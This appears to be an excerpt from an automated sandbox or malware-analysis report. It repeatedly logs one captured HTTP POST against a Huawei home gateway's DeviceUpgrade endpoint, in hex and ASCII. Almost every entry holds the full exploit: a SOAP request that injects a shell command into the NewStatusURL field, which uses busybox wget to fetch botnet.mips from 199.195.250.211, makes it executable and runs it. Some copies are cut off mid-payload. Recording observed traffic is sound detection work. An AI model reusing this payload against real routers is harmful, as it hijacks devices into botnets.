68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima hua
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r 